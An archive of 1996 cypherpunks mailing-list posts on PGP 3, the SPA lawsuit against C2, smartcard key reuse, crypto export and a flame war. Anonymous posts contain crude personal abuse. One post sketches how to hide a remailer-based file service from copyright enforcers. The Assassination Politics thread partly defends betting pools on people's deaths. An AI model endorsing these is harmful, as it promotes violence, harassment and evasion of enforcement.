Message-ID: <199610121936.MAA05129@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


On or About 12 Oct 96 at 11:28, Steven L Baur wrote:

> >From the cypherpunks memory division.
> 
> Tim's message:

> Well, to one who inserts "(spit)" after nearly every name he cites,
> and critiques Hayek as "fucking unreadable. Shit.," I suppose Hayek
> must indeed seem unreadable. Shit.
> 
> After all, Hayek rarely writes things like: "The senile Von Mises
> (spit) and his Sovok Cabal plotters...."
> 
> As to "forcing" your students to read Hayek, just who is in charge?
> If you're the instructor, they can choose to read what you tell them
> to read, or be unprepared on the exams you give and possibly flunk
> the class. What part of "Required Reading" do you or your students
> not understand?
> 
> --Tim (spit) May

I had almost forgotten what started this war of flame.  That's not so 
bad.

Ross

=-=-=-=-=-=-
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 12 Oct 1996 09:53:53 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Crypto AG - Secret GAK Partner ?
Message-ID: <1.5.4.16.19961012165215.109f73f4@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


>>This is nothing new. But how about faxing the article to John Young, so 
>>we all may benefit?
>
>There is no need to. They have an archive at http://www.spiegel.de/archiv/
>(you have to register before you can use it). The article was in
>Der Spiegel 36/1996.


We have put the Spiegel German text at:


     http://jya.com/cryptoag.htm


Our German-to-English translation program choked on the crypto-lingo arcana. 


C'punk German linguists could surely translate "Crypto-Geschaftsfuhrer."


Maybe Bob Newman with Motorola can at least verify his quotes.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Sat, 12 Oct 1996 12:47:54 -0700 (PDT)
To: Duncan Frissell <frissell@panix.com>
Subject: Re: SPA sues C2, other ISPs and users
Message-ID: <3.0b28.32.19961012125407.00772780@ricochet.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:48 AM 10/12/96 -0400, Duncan Frissell wrote:
>At 02:12 PM 10/11/96 -0700, Greg Broiles wrote:
>>
>>It's inappropriate to expect Sameer or any other C2
>>employee/agent/representative to discuss the suit before they've had a
>>chance to find and meet with an attorney; in some circumstances it might
>>never be prudent for them to make a public statement about the suit. 
>
>Is this good advice?  When attacked, isn't it good to offer as strong a
>defense as possible including (but not limited to) verbal abuse, physical
>confrontations, countersuits, standing outside people's houses, picketing,
>letters, public appearances, urging other people to express their views,
>etc.

After considering everything carefully, yeah, it's probably good to make a
strong statement disputing the essentials of the suit. But given the
counterintuitive nature of contributory infringement, it's also probably
good to think carefully about what to say, when. I wasn't trying to tell
Sameer what to do - just trying to make it clear that it's normal for him
to take a few days or longer to say anything. I'm sure the SPA's press
release was cleared by their legal people - it was probably prepared before
the suits were even filed. 

--
Greg Broiles                |  "We pretend to be their friends,
gbroiles@netbox.com         |   but they fuck with our heads."
http://www.io.com/~gbroiles |
                            |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Sat, 12 Oct 1996 13:29:37 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: RSA
Message-ID: <199610122019.NAA07014@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Timmy Mayhem is just a poor excuse for an unschooled, retarded thug.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 12 Oct 1996 10:25:53 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: WW II Crypto. History
Message-ID: <1.5.4.16.19961012172358.0cb7cb6c@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:26 AM 10/12/96 -0800, Richard Pekelney wrote:
>Folks,
>
>Those interested in WW II Cryptolographic History should check out:
>
>www.maritime.org/ecm2.shtml

----------


Richard's excellent work might be kaliedoscoped with a view of the
Index of 5,000 crypto-related "high-interest" files declassified by NSA 
under the OPENDOOR program. See NSA's home page for a link to 
the awesome list of devices, codes, messages, betrayals, tricks, lies 
and unsung wizards from 1916 through 1945. Just a tiny preview of
what yet squats locked in the crypto-crypt of NSAK-America.


We've put the Index at:


     http://jya.com/nsaopen1.htm







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal Finney <hal@rain.org>
Date: Sat, 12 Oct 1996 13:59:32 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: pgp, edi, s/mime
Message-ID: <199610122049.NAA08133@crypt>
MIME-Version: 1.0
Content-Type: text/plain


From: Raph Levien <raph@cs.berkeley.edu>
> I think you're referring to the possibility that PGP 3.0 may use a
> public key algorithm other than RSA. However, if this is the case, it
> won't be compatible with PGP's installed base. In addition, I don't
> believe that there has been a public key encryption algorithm proposed
> which is free of patent controversy.

I have recently gone to work for PGP, Inc.

PGP 3 will support both discrete log and RSA cryptography.  It will
interoperate with both, so that when you send a message to someone
who has an RSA key, it will use RSA, and when you send to someone who
has a discrete log (El Gamal/DSS) key, it will use discrete log
algorithms.  So there is full compatibility with existing keys, while
allowing people to move to cryptography which will be patent free
in the U.S. after next year.

A free version will be available with this functionality, with
source code.  Existing users of PGP will hopefully find it easy
to upgrade.

I cannot say when it will be available, other than to say that the
functionality exists for generating and using all these kinds of keys,
and we have four programmers, including myself, working full time on
getting this version out.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Sat, 12 Oct 1996 11:03:00 -0700 (PDT)
To: azur@netcom.com (Steve Schear)
Subject: Re: exporting signatures only/CAPI (was Re: Why not PGP?)
In-Reply-To: <v02130502ae850fb9a80c@[10.0.2.15]>
Message-ID: <199610121908.OAA19871@homeport.org>
MIME-Version: 1.0
Content-Type: text


Steve Schear wrote:
| (Adam Back wrote:)
| >The new owner of the CAPI signatory key would need a good reputation,
| >and presumably a policy of signing any (non-GAKked) CAPI modules
| >signed by microsoft, and anything else that anyone wants signed.

| An excellent suggestion.

	How does a signer maintain a reputation if it will sign
anything anyone wants signed?  I can see a business for a non-US
company to certify a CSP and sign it, but thats not the same as
anything MS signs, or anything anyone else wants signed.

	There may be room for compitition here. :)

Adam

-- 
"Every year the Republicans campaign like Libertarians, and then go to
Wasthington and spend like Democrats."

Vote Harry Browne for President.  http://www.harrybrowne96.org







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer@c2.net
Date: Sat, 12 Oct 1996 14:15:54 -0700 (PDT)
To: adam@homeport.org (Adam Shostack)
Subject: Re: SPA sues C2, other ISPs and users
In-Reply-To: <199610120402.XAA18045@homeport.org>
Message-ID: <199610122115.OAA24691@atropos.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> I prefer to offer shows of support in the forms of a donation to a
> legal defense fund.  That way, I'm clearly supporting the
> organization, not becoming a customer.
> 
> Sameer, if this gets pricey, please establish such a fund, and let us
> all know about it.

	Such things are in the queue. We'll be doing a press release
for monday.

-- 
Sameer Parekh					Voice:   510-986-8770
C2Net						FAX:     510-986-8777
The Internet Privacy Provider
http://www.c2.net/				sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: amnesia@chardos.connix.com (Anonymous)
Date: Sat, 12 Oct 1996 16:25:36 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Quadratic residues
Message-ID: <199610121934.PAA04867@chardos.connix.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim C[unt] May's obsessive masturbation has lead to
advanced degree of blindness and hairy palms.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Scanlon <tfs@vampire.science.gmu.edu>
Date: Sat, 12 Oct 1996 13:35:39 -0700 (PDT)
To: cypherpunks@toad.com (setting records in noise every day)
Subject: Re: LET'S s/MEET/SHOOT DIMITRI
In-Reply-To: <m27mowavgo.fsf@deanna.miranova.com>
Message-ID: <9610122035.AA15539@vampire.science.gmu.edu>
MIME-Version: 1.0
Content-Type: text



Well, I don't think he much cares what enyone thinks. If he did,
he wouldn't be spewing childish obscene SPAM about Tim May 
non-stop. I've never seen someone engage in such a singlehanded
& through devastation of their own credibility as Dimitri has
to his own.

To say the least the SPAM coming to the list from him is
totaly innapropriate. Hell, the periodic junk-spam-mail I get
to 'make money fast' is less obnoxious.

In any case I wish he'd fall off a pier, he certainly isn't much
of a cypherpunk in my rather liberal interpretation of what it takes.
I applaude any efforts to get him to shut up, and/or go away. 
Hopefully something productive will happen, that would be a real
win/win, like he get's hired by the FBI, get's off this list,
and he causes counter-productivity there, as well as is gone from
here.


Tim







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 12 Oct 1996 15:29:43 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Fuck Cyberpromo
Message-ID: <v03007801ae85b0546a74@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


It seems to me that every time I send a message to cypherpunks, I get a 10k
message entitled "RESPONSE FROM CYBERPROMO" from "abusebot@savetrees.com
(Mail AutoResponder)" .

It stands to reason that everyone who posts this list gets the same thing.
I've certainly seen enough people here complain about it.

So. The messages all say send complaints to wallace@cyberpromo.com . That's
what I'm going to do. With every message I get from cyberpromo from now on.

I would expect that if everyone on this list who gets one of these things
-- which I suspect is everyone who posts here lately -- turned right around
and sent it on to this wallace@cyberpromo.com address, those, er,
caprophageous cretins, (thanks, DCF; don't sue me for copyright violations
;-)) would get the hint in a hurry.

I'm starting with the one I have, and, of course, I'll also do it for the
message I get from sending *this* posting.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@miron.vip.best.com
Date: Sat, 12 Oct 1996 16:59:17 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Tim May is a fine person.
Message-ID: <199610122356.QAA00286@miron.vip.best.com>
MIME-Version: 1.0
Content-Type: text/plain



Tim May's razor sharp wit and excellent accurate analyses have added
much to this group. His early support of the cypherpunk concept has
helped advance the cause of cypherpunkdom. In short, Tim May is the top
of the top, the best of the pest. His impeccable tolerance with totally
unwarranted scurrilous attacks is truly mind boggling. I think we should
all pay Tim may tribute for his fine contributions!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 12 Oct 1996 15:52:19 -0700 (PDT)
To: Hal Finney <cypherpunks@toad.com
Subject: Re: pgp, edi, s/mime
In-Reply-To: <199610122049.NAA08133@crypt>
Message-ID: <v0300780cae85d0c205a8@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:49 pm -0400 10/12/96, Hal Finney wrote:

> I have recently gone to work for PGP, Inc.

Yes!!!!  Yes!!!!  Yes!!!!

There *is* a God.

Thank you Phil. Thank you whoever is funding Phil.

Hot Damn. I love this place.

I know that PGP, Inc. has a tough row to hoe now, but damn, they're hiring
all the right people.

I haven't had this much fun since the hogs ate my little brother...

Cheers,
Bob Hettinga


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Z.B." <zachb@netcom.com>
Date: Sat, 12 Oct 1996 18:51:51 -0700 (PDT)
To: Ross.Wright@adnetsol.com
Subject: Re: LET'S MEET DIMITRI
In-Reply-To: <199610130138.SAA06974@netcom19.netcom.com>
Message-ID: <Pine.3.89.9610121820.A3140-0100000@netcom19>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 12 Oct 1996, Ross Wright wrote:
> On or About 12 Oct 96 at 11:28, Steven L Baur wrote:
> > Tim's message:
> 
> > Well, to one who inserts "(spit)" after nearly every name he cites,
> > and critiques Hayek as "fucking unreadable. Shit.," I suppose Hayek
> > must indeed seem unreadable. Shit.
> > 
> > After all, Hayek rarely writes things like: "The senile Von Mises
> > (spit) and his Sovok Cabal plotters...."
> > 
> > As to "forcing" your students to read Hayek, just who is in charge?
> > If you're the instructor, they can choose to read what you tell them
> > to read, or be unprepared on the exams you give and possibly flunk
> > the class. What part of "Required Reading" do you or your students
> > not understand?
> > 
> > --Tim (spit) May
> 
> I had almost forgotten what started this war of flame.  That's not so 
> bad.
> 
Not very bad at all, considering all of the subsequent messages Vulis 
posted in response to that one.  All of the (spit), (fart), and so on 
got annoying REAL fast, not to mention the anonymous Tim-bashing messages 
which he is probably doing as well.


 
Zach Babayco 
zachb@netcom.com <-------finger for PGP public key
http://www.geocities.com/SiliconValley/Park/4127
-----
If you need to know how to set up a mail filter or defend against 
emailbombs, send me a message with the words "get helpfile" (without the 
" marks) in the SUBJECT: header.  I have several useful FAQ's and documents 
available.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 12 Oct 1996 17:10:28 -0700 (PDT)
To: Robert Hettinga <cypherpunks@toad.com
Subject: Re: Fuck Cyberpromo
Message-ID: <3.0b19.32.19961012201018.00eb7c3c@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:38 PM 10/12/96 -0400, Robert Hettinga wrote:

>and sent it on to this wallace@cyberpromo.com address, those, er,
>caprophageous cretins, (thanks, DCF; don't sue me for copyright violations
>;-)) would get the hint in a hurry.

Unfortunately, I need a new spell checker. The correct spelling is
coprophagous cretin.  Remember coprolite (fossilized dung).

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 12 Oct 1996 17:33:53 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Not That Smart Cards
Message-ID: <1.5.4.16.19961013003211.370f02a6@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   New Scientist, 12 October 1996, p. 21.


   Smart, but not that smart

   By Mark Ward


   Credit card companies are turning to smartcards to help
   them fight fraud. But manufacturing problems may mean
   that they are no more secure than existing cards.

   Conventional credit cards hold information in a magnetic
   strip that typically holds about 200 bytes of information
   -- enough for the card and version number, expiry date
   and owner's name. Smartcards have a built-in
   microprocessor that can handle several kilobytes of data,
   equivalent to pages of information.

   Having the tiny computer on board means that each card
   can have a unique identity, and this ought to help to
   protect the information held on it. But to give a card an
   individual electronic signature, its built-in processor
   has to do a long calculation. This is a time-consuming
   process, so some card manufacturers intend to issue cards
   with one of several thousand preprogrammed identities.
   Each card will therefore have thousands of duplicates,
   all of which will be vulnerable if a criminal cracks the
   code for any one of them.

   In 1994 the credit card companies Europay, Mastercard and
   Visa got together to draw up a common specification for
   smartcards, known as EMV The cards will rely for security
   on the RSA encryption algorithm. This uses two very large
   numbers, called keys. One is passed around in public and
   the other remains hidden in the card's memory. The keys
   are 155-digit prime numbers which are multiplied together
   to make an even larger number which is then used to code
   and decode the data on the card.

   The problem for card manufacturers is working out the
   large prime numbers in the first place. "Companies making
   smartcards turn one out every 15 seconds," says Dmitri
   Markikis, a security analyst at Mondex, a London-based
   company that is experimenting with smartcards as
   electronic purses. "But it takes longer -- estimates
   range from 6 to 30 seconds -- for the card to generate
   its RSA keys." To speed things up some manufacturers are
   considering generating 10,000 preset keys and inserting
   one as each card is made.

   Louis Guillou, a researcher at France Telecom's
   Commercial Centre for the Study of Television and
   Telecommunications highlighted the problem this summer at
   the Crypto 96 conference in California. The three EMV
   partners circulate over 800 million credit cards between
   them, yet are likely to use a limited population of keys.
   "Trying to reuse the keys several times is very
   dangerous," says Guillou.

   Card manufacturers say the problem will be solved as
   smartcards become more powerful. "Soon the processing
   power of a smartcard will be such that it will be able to
   overcome that kind of issue," says Cyril Annarella, a
   technical consultant for the French company Gemplus,
   which makes cards for the EMV members.

   [End]













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew Ghio <ghio@myriad.alias.net>
Date: Sat, 12 Oct 1996 17:48:37 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: SPA sues C2, other ISPs and users
In-Reply-To: <3.0b28.32.19961011141214.006e8aec@ricochet.net>
Message-ID: <199610130045.UAA03900@myriad>
MIME-Version: 1.0
Content-Type: text/plain


gbroiles@netbox.com (Greg Broiles) wrote:

> The SPA has apparently adopted two relatively aggressive litigation
> strategies - putting ISP's in the position of disclosing otherwise
> confidential customer information or being sued themselves, and treating
> peripheral data about copyrighted works like copyrighted works themselves
> (e.g., serial numbers). Particularly interesting is that they seem to be
> claiming that a *link* to a pirate FTP site is itself infringing
> (potentially contributory infringement).

Claiming that a link to a pirate FTP site is illegal, is a fairly difficult
position to defend.  It's not illegal to say "someone is selling stolen
property on the corner of First Street downtown".  It's just a statement of
fact.  They could try to argue that there was some intent to commit a
crime... but they'd have to have some real proof of that.

Their claim that "peripheral data" is illegal is a rather novel idea, and
not supported (to my knowledge) by precedent.  I don't think anyone could
argue that a serial number or password is by itself worthy of copyright
protection, since it lacks any creative expression, so they are claiming
it is "indirect infringement".  There is an interesting case which dealt
with this issue awhile back:  A company, Central Point Software, began
marketing a product in the early 1980's called Copy II Plus.  This was a
fairly standard disk-copying program, but its key selling feature was its
"parameter list".  This parameter list was a list of specific commands and
modifications necessary to copy protected software, and in most cases, to
remove the copy protection entirely.  They sold, by subscription, quarterly
updates to this list, which grew to contain deprotection information for
about 10,000 programs.  Obviously, others in the software industry were not
happy with this, and filed suit against Central Point.  I don't remember
the details of the case - but Central Point Software won, and continued
publishing updated lists.  (Anyone here have a reference for this case?)
Interestingly, by the early 90's, few software companies were using
disk-format-based copy protection, and as such the market for Copy II Plus
(and its successors Copy II Mac and Copy II PC) dwindled.  Central Point
Software folded and (I think) was bought out by Symantec.

A few months ago I saw Sameer grumbling about people "not paying for
Apache-SSL".  Now SPA claims he's operating an ISP to promote piracy.  So
first he's a software publisher and now he's a software pirate.  Uh, yeah,
whatever.  Obviously SPA is on a PR campaign here which defies all
conventional logic.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@cs.berkeley.edu>
Date: Sat, 12 Oct 1996 21:37:44 -0700 (PDT)
To: Hal Finney <hal@rain.org>
Subject: Re: pgp, edi, s/mime
In-Reply-To: <199610122049.NAA08133@crypt>
Message-ID: <32607201.229CCDD1@cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hal Finney wrote:
> I have recently gone to work for PGP, Inc.

This is extremely good news. I publicly take back a lot of my pessimism
about the PGP project.

> PGP 3 will support both discrete log and RSA cryptography.  It will
> interoperate with both, so that when you send a message to someone
> who has an RSA key, it will use RSA, and when you send to someone who
> has a discrete log (El Gamal/DSS) key, it will use discrete log
> algorithms.  So there is full compatibility with existing keys, while
> allowing people to move to cryptography which will be patent free
> in the U.S. after next year.

Ok. I'll take your word for it.

> A free version will be available with this functionality, with
> source code.  Existing users of PGP will hopefully find it easy
> to upgrade.
> 
> I cannot say when it will be available, other than to say that the
> functionality exists for generating and using all these kinds of keys,
> and we have four programmers, including myself, working full time on
> getting this version out.

Good news.

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sun, 13 Oct 1996 03:13:32 -0700 (PDT)
To: azur@netcom.com
Subject: Re: exporting signatures only/CAPI (was Re: Why not PGP?)
In-Reply-To: <v02130502ae850fb9a80c@[10.0.2.15]>
Message-ID: <199610122109.WAA01149@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Steve Shear <azur@netcom.com> writes:
> >The problem however, is finding a non-US site to hold the hot potato
> >once it has been exported.  For example 128 bit Netscape beta was
> >exported a while ago.  I don't see it on any non-US sites.  This is
> >due to Netscape's licensing requirements, you need a license to be a
> >netscape distribution site, the license doesn't include the right to
> >mirror non-exportable versions on non-US sites.
> 
> That's one good application for remailers, and .warez newsgroups. at.

I don't know of any advertised files by email services using nym
servers, where the file request, and the files are both sent via
remailers.

The problem with this is currently is that the nym servers couldn't
stand up to the scrutiny if SPA or whoever got interested.  The
message flood attack on the nym would reveal the services host.

The BlackNet architecture solves this problem by posting requests
encrypted with the services key to a newsgroup, but USENET newsgroup
disitribution time is slow (*), and people are spoilt these days with
WWW, and expect results now, not days later.

The requested file can be posted via mixmaster.  You would want to use
a different, random chain of remailers each time.  A reverse message
flood could reveal the host also, as you can request lots of copies,
and the service will blindly serve the files.  (If someone wants to
discover the service host, they send 1000s of requests, then sit back
and watch which user sends most data into the remailer net.)

To combat this the service could impose a limit on the number of
copies it would serve per day.  This allows a denial of service
attack, if someone wants to stop anyone else getting a copy, they just
saturate the service.  Still an improvement over no limit.

Of course Ross Anderson's `eternity service' provides the general case
solution for distribution of such data.  It is complex to implement
well though.

Adam
--
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 12 Oct 1996 23:01:40 -0700 (PDT)
To: jimbell@pacifier.com
Subject: Re: is there no end to AP & Creative Wiretap Arguments? [RANT]
In-Reply-To: <v02130504ae85133a7ab2@[10.0.2.15]>
Message-ID: <32608444.7E60@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Steve Schear wrote:
> > after months of patient explanations to Jim Bell and sympathizers,
> > going over the same points in 31 flavours, the same arguments of
> > what I would call "respectable" anarchy (well stated by Tim May)
> > rather than the "world at war" anarchy of Jim Bell - where are we?
> > I read Jim's first "manifesto" at least 18 months ago; and, the
> > "refined manifsto" less than a month ago.  I have yet to see an
> > application of civilization which brings AP society up to even the
> > level of Tombstone AZ just prior to the OK Corral.

The difference is, Tombstone people didn't have computers and instant 
communications all over the world.  If the govt. of 1881 were to send 
bunches of troops to Tombstone to raid the place and kill everyone, the 
poor slobs who lived there might not even know in advance to protect 
themselves or run away, save a relatively new invention called the 
telegraph.  We lived with the telegraph and iron horse, and we'll live 
with crypto and AP (some of us, anyway, hee hee).

> How about as a means of coercing war criminals ethnic purgers, as
> those in Bosnia/Serbia, to turn themselves in to proper tribunals for
> judging. Having AP bettors wager $100,000s on your untimely
> retirement, unless you turn yourself in, could induce one to consider
> conventional justice.

I wonder what "proper" tribunals might be.  Ramsey Clark wrote 
extensively about the convictions of Bush, Schwartzkopf, and others, but 
all that happened in the "great white world" was these folks getting 
knighted by Her Majesty.  Try to visualize Bush and Schwartzkopf down on 
their knees with the queen's sword over their heads.  Justice has to 
start at the top, not with Bosnia.

> I find it appalling the duplicity of world government leaders which
> talk frequently of world justice but are only prepared to expend real
> effort to catch the few terrorists attacking their citizens, while
> those who commit genocide on other are given half-hearted slaps of the
> hand and told not to sin again, or less through government inaction.

1. If you find the duplicity appalling, why would you want to invite
   those same lying scum to preside over the "war crimes tribunals"?

2. I don't think those leaders are trying to catch terrorists who might
   attack "their citizens", their concern is to catch terrorists who
   threaten their money directly, and citizens are important to them
   only in the same sense as workers in a corporation to a supervisor:
   The more underlings you have under you, the more you get paid.

> > Jim's theories all hinge on betting pools which supposedly can be
> > run like the lottery where the poor can share a ticket (egalitarian,
> > of course), anonyminity (which as an argument is appropriate, but
> > what for in a selfish immoral act?), and a justice is served
> > attitude, even if there are mistakes.

Every year some 60,000 people die and hundreds of thousands are severely 
injured in the U.S. from traffic "accidents", which are almost totally 
the result of unnecessary acts of aggression by neurotic drivers who 
will not give the proper safe space to others.  And this is deliberate, 
don't forget.  And you worry more about mistakes?

> Just think of it as a sportsbook with different games and players.
> You wouldn't accuse bettors of trying to influence the outcome a
> football game would you?  :-)

> > the whole concept of AP does not even support the concept of
> > "justice is expeditiously served!" it is a resort to the manners
> > of dogs and monkeys sitting at the same table --a spiteful,
> > arrogant player can move the betting pools to assassinate anyone.

Beating up on dogs and monkeys, tsk tsk.  Sounds like speciesism.
Next thing you know, it's racism, sexism, and homophobia. Besides,
what's to fear from spiteful and arrogant players?  You'll know
who they are in advance.

> > In other words, are we planning to use James Caan as the lead
> > runner in "Roller Ball"  --except this time we're playing with a
> > "live" society for which we hold in common the utmost contempt?
> > are we trying to return to the bread and circus mentality of
> > Rome on its deathbed and slide to subjecation by Attila the Hun
> > who was actually stopped from sacking Rome after the Pope so
> > impressed him with his regal robes....  deciding  tribute from an
> > established dictatorship was more reliable?  --and less costly?!?

Gotta give Atilla credit - business is business.  It's not like the Pope 
doesn't know the risks of sitting up there and collecting the glory (and 
the money).

> No, I see it as another possible means of encouraging justice in a
> world where the largest criminals are often beyond the reach of the
> world community due to 'political complications'.

Yeah.  At Nurnburg, how many were tried, and how many were executed? 
Very, very few.  John J. McCloy is reputed to have arranged the trials 
in the first place so we could launder out the guys (and their secrets) 
we needed to keep, to fight the Cold War.  Justice?  Or just us?

> > has anyone seen a single social moral fiber in Jim's often
> > passionate arguments for AP, or even in the "results" in a society
> > which will never breed another leader: religious, secular, or even
> > political?  does AP permit anything except slaves and drones which
> > can just as easily be replaced by robots?  maybe noone will miss
> > news reports (as 'canned' as they are), or movies which entertain or
> > provoke?  or ice cream sundaes at the soda fountain? ...and the
> > disappearance of grocers, and doctors, and dentists bringing forth
> > a new age of subsistence farming and hunting for the lucky few who
> > might live to a readjusted live expectancy point of 30 yrs, burning
> > books and computer printouts for cooking and warmth.

Why do you have to equate what we have now with leaders?  Are you saying 
that Dick Armey, Charles Schumer, Newt Gingrich, Larry Eagleburger, and 
Brent Scowcroft (to name a few) are leaders?  Like Martin Luther King, 
Jr. was a leader?  Surely you jest!

I see here a passionate, emotional, and nostalgic argument for what 
never truly was; an illusion as it were.  We'd be better off with 
reality, and without these parasites.  It's called growing up, getting 
off of the really bad kind of welfare, dependence on lying scummy 
parasitical politicians who'd run over their own grandmother to get 
their man elected.  And BTW, I'm sure the SOB Colson actually said it.

> > why have books or knowledge when there is noone willing to
> > accept the responsibility of educating your children, the instructor
> > waiting for the parent of Dumb Suzy to avenge her failing grade?
> > after all, Suzy does not need to read, not even well enough to
> > take the test for a driver's license --there is no infrastructure;
> > no need to learn math well enough to possibly balance a checkbook
> > --after all, there are no banks...

Gosh darn.  Think of what the world would be like if we had to take Suzy 
down to the independent book store, the one with all those conspiracy 
and new-agey sensitivity books and stuff.  Wouldn't be nearly as comfy 
as the trip to Borders with the Starbucks coffee shop inside.

> I think AP, or its ilk, may be a likely outcome in a would unable or
> unwilling to apply justice even-handedly no matter what a person's
> station. It's a popular rebellion to encourage the 'legal' world
> justice system to have more backbone and care less about politics or
> risk being marginalized.

> > "Assassination Politics" is nothing more than a childish game
> > which 'legalizes' killing anyone you wish.  are AP's proponents so
> > naive they believe the bookies will not have any public person
> > assassinated by rigging the pools for their own profit?

Did you ever think about legality?  Why were the laws developed?  To 
protect us, the little guys?  Please be a little cynical, anyway.  The 
laws were developed to protect the big guys and their investments, be it 
the Constitution (protecting slave owners and the Yankee investors who 
depended on Southern production), the USC and UCC, or NAFTA and GATT.

> Mathematically verifiable safeguards would need be developed so that
> this is minimized or eliminated as a possibility before any
> sportsbooks, what ever the sport, operate.  This is a function the
> community of cypherpunks and professional crypto and security people
> should serve.

Serve the people.  Good idea.  Assassination has been serving the big 
guys essentially unimpeded by public objection or protest, so how can a 
person argue against AP without first applying the objection to govt.?

> > remember, law enforcement ceased with the return of 'law of the
> > jungle'  anarchy.

When the U.S. Justice Dept. can fake evidence to "get" someone they 
don't like (Demjanjuk, for example), and then the Israeli supreme court, 
realizing that the U.S. govt. has far less integrity than they'd 
imagined, had to release the man because of this embarassment, in spite 
of vehement opposition in their own back yard, what do we do then?

> All human rights are Naturally derived as are the 'Laws of the
> Jungle'. Governments instituted among men should derive their rights
> from the soverignty of its citizens.  Unfortunately, many countries
> choose to ignore this.  AP should serve an occassionally competitive
> system to keep the 'duly consistuted' system on its toes lest those in
> authority reap the law of the jungle.

Actually, when the authorities become as corrupt as they have in the 
U.S., the law of the jungle is already applied defacto to the masses 
anyway.  Again, laws mainly protect those the lawmakers serve, and the 
little people get just the crumbs when the system is more-or-less young 
and working.  When the system gets older and more corrupt, even the 
crumbs are hard to come by.  It'll be interesting to see what they'll do 
to pacify Maxine Waters on this CIA/crack cocaine expose.  You just know 
there won't possibly be any real justice, not with the SS/CIA involved.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 12 Oct 1996 23:33:34 -0700 (PDT)
To: Clint Barnett <cbarnett@eciad.bc.ca>
Subject: Re: NSA/GCSB spying shown on NZ television [RANT]
In-Reply-To: <Pine.SGI.3.91.961012143913.23277A-100000@oswald>
Message-ID: <32608A7B.4F66@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Clint Barnett wrote:
> has anyone seen the Mike Myers flic "So I Married An Axe Murderer"?
> His "father" in the movie has an awesome theory about a group of the
> 5 most powerful epole in the world running everything, including the
> newspapers, known as the Pentavaret. The Vatican, the Queen, the
> Gettys, the Rothchilds, and Colonel Sanders before he went tits up.
> Not to discredit your information, but you just reminded me of it and
> I thought it was funny enough to mention.

And I thought this was well worth mentioning on the list:

I am always amused (when I'm not absolutely hysterical) at how certain 
people can sit back and smirk at conspiracy "theories" like the 
